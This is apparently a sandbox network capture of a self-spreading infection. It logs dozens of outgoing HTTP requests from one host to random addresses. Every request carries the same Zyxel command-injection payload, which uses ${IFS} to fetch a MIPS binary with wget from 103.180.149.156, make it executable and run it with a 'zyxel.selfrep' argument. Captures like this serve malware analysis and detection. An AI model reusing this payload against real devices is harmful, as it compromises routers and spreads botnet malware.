                                                      Feb 2, 2024 06:36:08.977008104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8195192.168.2.144048659.176.128.224443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.977041006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8196192.168.2.1444392166.42.234.60443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.977067947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8197192.168.2.145867031.80.204.10443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.977132082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8198192.168.2.1452218114.122.90.24443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.977200985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8199192.168.2.1456536152.132.130.112443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.977241993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8200192.168.2.1437206179.126.190.199443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.977272987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8201192.168.2.1449058123.9.228.86443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.977319002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8202192.168.2.1439584100.4.51.182443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.977385044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8203192.168.2.144613020.231.8.199443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.977426052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8204192.168.2.144249212.129.49.176443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.977482080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8205192.168.2.1456888167.250.1.196443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.977508068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8206192.168.2.1439026143.0.18.63443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.977549076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8207192.168.2.143875841.123.9.145443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.977603912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8208192.168.2.14585004.168.233.14443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.977654934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8209192.168.2.1444692151.151.122.61443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.977685928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8210192.168.2.144747485.237.198.156443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.977721930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8211192.168.2.14529444.230.43.141443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.977746964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8212192.168.2.145593898.157.228.121443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.977777004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8213192.168.2.1436392210.10.227.107443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.977811098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8214192.168.2.144791275.41.182.78443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.977849960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8215192.168.2.1459848106.37.249.227443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.977911949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8216192.168.2.1437692153.176.0.53443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.977931976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8217192.168.2.1444012106.151.193.198443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.977952957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8218192.168.2.1441846154.216.116.186443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.977988005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8219192.168.2.1435062197.208.179.169443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.978038073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8220192.168.2.1448584199.209.104.127443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.978085995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8221192.168.2.1453128133.46.240.74443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.978127003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8222192.168.2.1444374187.169.30.219443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.978171110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8223192.168.2.1436028197.50.19.110443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.978192091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8224192.168.2.1442862157.145.6.92443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.978264093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8225192.168.2.143975493.228.102.99443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.978286028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8226192.168.2.14406822.2.27.186443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.978341103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8227192.168.2.1436994150.210.131.216443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.978370905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8228192.168.2.1441202155.103.93.162443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.978419065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8229192.168.2.1460228104.53.118.46443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.978451014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8230192.168.2.1456338160.104.54.99443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.978480101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8231192.168.2.1434200101.23.92.181443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.978533030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8232192.168.2.143916259.117.17.233443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.978588104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8233192.168.2.1459982176.47.118.88443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.978626966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8234192.168.2.1444532200.156.183.230443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.978658915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8235192.168.2.1437008191.238.171.192443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.978694916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8236192.168.2.14473548.17.101.65443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.978743076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8237192.168.2.143942653.88.202.161443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.978771925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8238192.168.2.1438566121.54.109.180443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.978821039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8239192.168.2.1452766167.185.26.200443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.978852034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8240192.168.2.1453910141.211.31.9443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.978898048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8241192.168.2.1460548187.77.133.181443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.978940964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8242192.168.2.144687444.213.82.183443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.978995085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8243192.168.2.1459896114.42.68.1443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.979027033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8244192.168.2.144100424.219.248.91443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.979055882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8245192.168.2.1447274124.150.40.195443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.979100943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8246192.168.2.144800057.77.224.205443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.979176044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8247192.168.2.144087636.242.247.126443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.979193926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8248192.168.2.14590545.50.37.165443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.979245901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8249192.168.2.1456792100.140.15.187443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.979290962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8250192.168.2.1460782112.31.238.200443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.979312897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8251192.168.2.1446856179.181.85.137443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.979348898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8252192.168.2.1444066102.32.102.18443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.979407072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8253192.168.2.145631064.118.53.77443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.979448080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8254192.168.2.1450492153.111.235.23443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.979476929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8255192.168.2.146098637.85.146.247443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.979547024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8256192.168.2.144610681.101.80.170443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.979593039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8257192.168.2.1450652178.211.34.173443
                                                      TimestampBytes transferredDirectionData
